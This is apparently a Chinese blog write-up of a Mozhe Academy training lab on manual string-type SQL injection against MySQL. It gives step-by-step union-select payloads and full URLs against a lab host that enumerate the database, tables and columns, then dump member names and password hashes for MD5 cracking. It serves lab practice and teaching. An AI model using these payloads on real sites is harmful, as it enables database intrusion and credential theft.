关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路

关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路
首先 思路没有打开 注意到登陆框下方有一个通知 以为是墨者官方通知元旦维修 却没想到这已经是靶场 是存在id参数
首先,在id后要加一个’号,在语句结束的时候,要用#结束,而#换成URL编码就是%23
第二:先判断注入,利用’and 1=1 %23去判断,结果存在注入
第三:判断字段数:‘order by 4 %23 ,有四个字段,联合查询 ’ union select 1,2,3,4 %23, 发现改为’order by 5%23是显示不正常的 所以就是到4 那么接下来
第四:得显示这个数据库的名字才能进行下一步的爆破 那么:显示当前数据库
id=tingjigonggao’ and 1=2 union all select 1,database(),3,4’
关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路_第1张图片
第五:爆mozhe_discuz_stormgroup数据库的表名:
http://219.153.49.228:45672//new_list.php?id=tingjigonggao’+and+1=2+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=‘mozhe_discuz_stormgroup’--+
关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路_第2张图片
第六:爆列名:
http://219.153.49.228:45672/new_list.php?id=tingjigonggao’+and+1=2+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_schema=‘mozhe_discuz_stormgroup’--+关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路_第3张图片
第七:查询账号密码
http://219.153.49.228:45672/new_list.php?id=tingjigonggao’ and 1=2 union select 1,group_concat(name),group_concat(password),4 from stormgroup_member %23
关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路_第4张图片
第八:md5解密
总结:本人对于手工注入也不是很熟悉,根据百度字符型注入代码一一尝试 整个思路大概就是检测是否存在注入 存在判断字符型还是数字型 然后爆数据库 查列表 。 本人小白 大佬勿喷 代码切记 个人的思路是这个思路

你可能感兴趣的:(关于墨者学院 SQL手工注入漏洞测试(MySQL数据库-字符型)解题思路)